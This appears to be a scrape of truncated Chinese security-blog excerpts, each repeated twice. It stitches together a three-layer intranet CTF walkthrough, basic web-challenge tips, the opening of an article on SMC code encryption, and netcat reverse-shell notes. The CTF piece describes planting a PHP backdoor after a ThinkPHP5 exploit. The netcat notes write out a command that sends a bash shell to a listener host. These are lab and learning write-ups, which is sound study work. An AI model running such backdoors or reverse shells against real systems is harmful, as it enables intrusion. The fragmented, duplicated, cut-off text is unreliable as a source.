CTF大赛模拟-CFS三层内网漫游环境：三台虚拟机，三个网络。target1:192.168.161.178,192.168.52.132（linux）target2:192.168.52.133,192.168.72.131（linux）target3:192.168.72.132（win7）攻击者只能与target1进行通讯外网打点访问192.168.161.178:80发现是thinkphp5的版本tp漏洞利用用tp5检测工具漏洞存在写入后门：echo''>/www/wwwroot/ThinkPHP/public/x.php蚁剑连接得到第一个flagmsf生成后门msfvenom-pli

CTF大赛模拟-CFS三层内网漫游环境：三台虚拟机，三个网络。target1:192.168.161.178,192.168.52.132（linux）target2:192.168.52.133,192.168.72.131（linux）target3:192.168.72.132（win7）攻击者只能与target1进行通讯外网打点访问192.168.161.178:80发现是thinkphp5的版本tp漏洞利用用tp5检测工具漏洞存在写入后门：echo''>/www/wwwroot/ThinkPHP/public/x.php蚁剑连接得到第一个flagmsf生成后门msfvenom-pli

web1f12查看网页源代码web2打开发现无法f12查看源代码方法1：禁用js方法2：打开空白网页提前f12查看源代码然后复制url打开方法3：Ctrl+u查看web3burp抓包web4打开网页访问robots.txt文件根据robots.txt内容访问flagishere.txt文件robots.txt是一个文本文件，位于网站根目录下，用于告诉搜索引擎爬虫哪些网页可以被爬取，哪些网页不可以被爬取。该文件包含了一些指令，告诉爬虫哪些页面可以访问、哪些页面不可以访问，以及爬虫的访问频率等信息。web5.phps"后缀，这是PHP源码文件的一种特殊形式，它会将代码高亮显示并以只读方式呈现。在一

web1f12查看网页源代码web2打开发现无法f12查看源代码方法1：禁用js方法2：打开空白网页提前f12查看源代码然后复制url打开方法3：Ctrl+u查看web3burp抓包web4打开网页访问robots.txt文件根据robots.txt内容访问flagishere.txt文件robots.txt是一个文本文件，位于网站根目录下，用于告诉搜索引擎爬虫哪些网页可以被爬取，哪些网页不可以被爬取。该文件包含了一些指令，告诉爬虫哪些页面可以访问、哪些页面不可以访问，以及爬虫的访问频率等信息。web5.phps"后缀，这是PHP源码文件的一种特殊形式，它会将代码高亮显示并以只读方式呈现。在一

前言近些日子在很多线上比赛中都遇到了smc文件加密技术,比较出名的有Hgame杭电的比赛,于是我准备实现一下这项技术，但是在网上看了很多文章，发现没有讲的特别详细的，或者是无法根据他们的方法进行实现这项技术，因此本篇文章就是分享我在学习以及尝试smc文件加密技术时所遇到的麻烦以及心得。该篇文章将会从我学习这项技术的视角，讲述我屡次失败的经历，一点点深入。SMC局部代码加密技术简介：SMC（Software-BasedMemoryEncryption）是一种局部代码加密技术，它可以将一个可执行文件的指定区段进行加密，使得黑客无法直接分析区段内的代码，从而增加恶意代码分析难度和降低恶意攻击成功的可

前言近些日子在很多线上比赛中都遇到了smc文件加密技术,比较出名的有Hgame杭电的比赛,于是我准备实现一下这项技术，但是在网上看了很多文章，发现没有讲的特别详细的，或者是无法根据他们的方法进行实现这项技术，因此本篇文章就是分享我在学习以及尝试smc文件加密技术时所遇到的麻烦以及心得。该篇文章将会从我学习这项技术的视角，讲述我屡次失败的经历，一点点深入。SMC局部代码加密技术简介：SMC（Software-BasedMemoryEncryption）是一种局部代码加密技术，它可以将一个可执行文件的指定区段进行加密，使得黑客无法直接分析区段内的代码，从而增加恶意代码分析难度和降低恶意攻击成功的可

[20230310]ncreversebashshell问题.txt--//测试ncreversebashshell遇到的问题,补充说明一下:--//192.168.100.78 linux$nc-l 1234--//192.168.100.235 linux$nc192.168.100.781234-e'/bin/bash-i'--//192.168.100.78 linux$nc-l 1234hostnameLIS-DB--//缺点就是命令给盲打,没有提示符,不支持tab,上下键选择命令.--//参考链接:https://www.infosecademy.com/netcat-revers

[20230310]ncreversebashshell问题.txt--//测试ncreversebashshell遇到的问题,补充说明一下:--//192.168.100.78 linux$nc-l 1234--//192.168.100.235 linux$nc192.168.100.781234-e'/bin/bash-i'--//192.168.100.78 linux$nc-l 1234hostnameLIS-DB--//缺点就是命令给盲打,没有提示符,不支持tab,上下键选择命令.--//参考链接:https://www.infosecademy.com/netcat-revers

[20230309]ncreversebashshellorcmd.exe(windows).txt--//nc是网络利器,以前曾经做过[20210908]ReverseShellwithBash.txt=>http://blog.itpub.net/267265/viewspace-2790933/。--//最近看了这方面内容,测试reserverbashshellorcmd.exe(windows)以及端口转发,代理:1.环境:--//首先找2,3台机器,千万不要在生产系统做这样的测试!!192.168.100.78 linux  (OracleLinuxServerrelease5.9)

[20230309]ncreversebashshellorcmd.exe(windows).txt--//nc是网络利器,以前曾经做过[20210908]ReverseShellwithBash.txt=>http://blog.itpub.net/267265/viewspace-2790933/。--//最近看了这方面内容,测试reserverbashshellorcmd.exe(windows)以及端口转发,代理:1.环境:--//首先找2,3台机器,千万不要在生产系统做这样的测试!!192.168.100.78 linux  (OracleLinuxServerrelease5.9)